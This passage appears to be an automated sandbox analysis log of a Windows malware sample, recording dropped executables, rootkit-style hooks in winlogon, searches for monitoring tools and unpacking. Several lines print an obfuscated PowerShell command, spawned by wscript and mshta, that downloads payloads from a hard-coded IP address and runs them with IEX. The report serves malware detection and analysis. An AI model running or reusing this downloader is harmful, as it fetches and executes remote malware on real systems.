              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
              Source: C:\ProgramData\Mig\Mig.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\Mig\Mig.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: 56ad364e35\System.Management.Automation.pdb\D source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32%%(N%%ew-O%%%bje%%%ctN%%%et.W%%%e';$c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%';$c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3-Join'');$TC=$TC.replace source: powershell.exe, 00000007.00000002.2293866711.000001CF7AE00000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.resourcesn.pdb source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: LB31.exe, Mig.exe
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb$ source: powershell.exe, 00000007.00000002.2293660004.000001CF7ADAE000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\AppData\Roaming\LB31.exeUnpacked PE file: 26.2.LB31.exe.7ff70a8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R; vs :ER;.rsrc:W;HV:W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R;
              Source: C:\ProgramData\Mig\Mig.exeUnpacked PE file: 61.2.Mig.exe.7ff6ae1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R; vs :ER;.rsrc:W;):W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R;
              .NET source code contains potential unpacker
              Source: file.exe, -Module-.cs.Net Code: _200F_206C_200C_200C_206B_206B_206B_206A_206D_202E_206B_200C_206B_206B_202C_200C_206C_206B_202E_200E_202D_206E_202E_200C_200E_206A_206D_200D_206F_202E_202B_202C_206E_200C_206B_200F_202A_206C_206D_202C_202E System.Reflection.Assembly.Load(byte[])
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: file.exeStatic PE information: 0xAA2EC588 [Wed Jun 23 04:52:24 2060 UTC]
              Source: initial sampleStatic PE information: section where entry point is pointing to: tnyudguu
              Source: LB31.exe.15.drStatic PE information: section name:
              Source: LB31.exe.15.drStatic PE information: section name: .idata
              Source: LB31.exe.15.drStatic PE information: section name:
              Source: LB31.exe.15.drStatic PE information: section name: ndryujmp
              Source: LB31.exe.15.drStatic PE information: section name: tnyudguu
              Source: LB31.exe.15.drStatic PE information: section name: .pdataI
              Source: Mig.exe.26.drStatic PE information: section name:
              Source: Mig.exe.26.drStatic PE information: section name: .idata
              Source: Mig.exe.26.drStatic PE information: section name:
              Source: Mig.exe.26.drStatic PE information: section name: ndryujmp
              Source: Mig.exe.26.drStatic PE information: section name: tnyudguu
              Source: Mig.exe.26.drStatic PE information: section name: .pdataI
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B00BD pushad ; iretd 0_2_00007FFD340B00C1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B00ED push A8BA495Dh; iretd 0_2_00007FFD340B011B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD340A00BD pushad ; iretd 5_2_00007FFD340A00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD340A0972 push E95A93D0h; ret 5_2_00007FFD340A09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD340A00BD pushad ; iretd 7_2_00007FFD340A00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34174A1D pushad ; iretd 7_2_00007FFD34174AAC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD340C00BD pushad ; iretd 15_2_00007FFD340C00C1
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCAFC2ACDD push rcx; retf 003Fh16_2_000001DCAFC2ACDE
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14FC6DD push rcx; retf 003Fh16_2_000001DCB14FC6DE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD33FAD2A5 pushad ; iretd 17_2_00007FFD33FAD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340C00BD pushad ; iretd 17_2_00007FFD340C00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD34192316 push 8B485F91h; iretd 17_2_00007FFD3419231B
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_000002246444ACDD push rcx; retf 003Fh19_2_000002246444ACDE
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D01659ACDD push rcx; retf 003Fh54_2_000002D01659ACDE
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165FC6DD push rcx; retf 003Fh54_2_000002D0165FC6DE
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F14FACDD push rcx; retf 003Fh62_2_000002D6F14FACDE
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F152C6DD push rcx; retf 003Fh62_2_000002D6F152C6DE
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FBACDD push rcx; retf 003Fh63_2_0000014E41FBACDE
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FEC6DD push rcx; retf 003Fh63_2_0000014E41FEC6DE
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B02ACDD push rcx; retf 003Fh64_2_000001D15B02ACDE
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B06C6DD push rcx; retf 003Fh64_2_000001D15B06C6DE
              Source: C:\Users\user\AppData\Roaming\LB31.exeFile created: C:\ProgramData\Mig\Mig.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB31.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\LB31.exeFile created: C:\ProgramData\Mig\Mig.exeJump to dropped file

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: Regmonclass
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: Filemonclass
              Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: FilemonClass
              Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: RegmonClass
              Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: FilemonClass
              Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hooks files or directories query functions (used to hide files and directories)
              Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
              Hooks processes query functions (used to hide processes)
              Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
              Hooks registry keys query functions (used to hide registry keys)
              Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
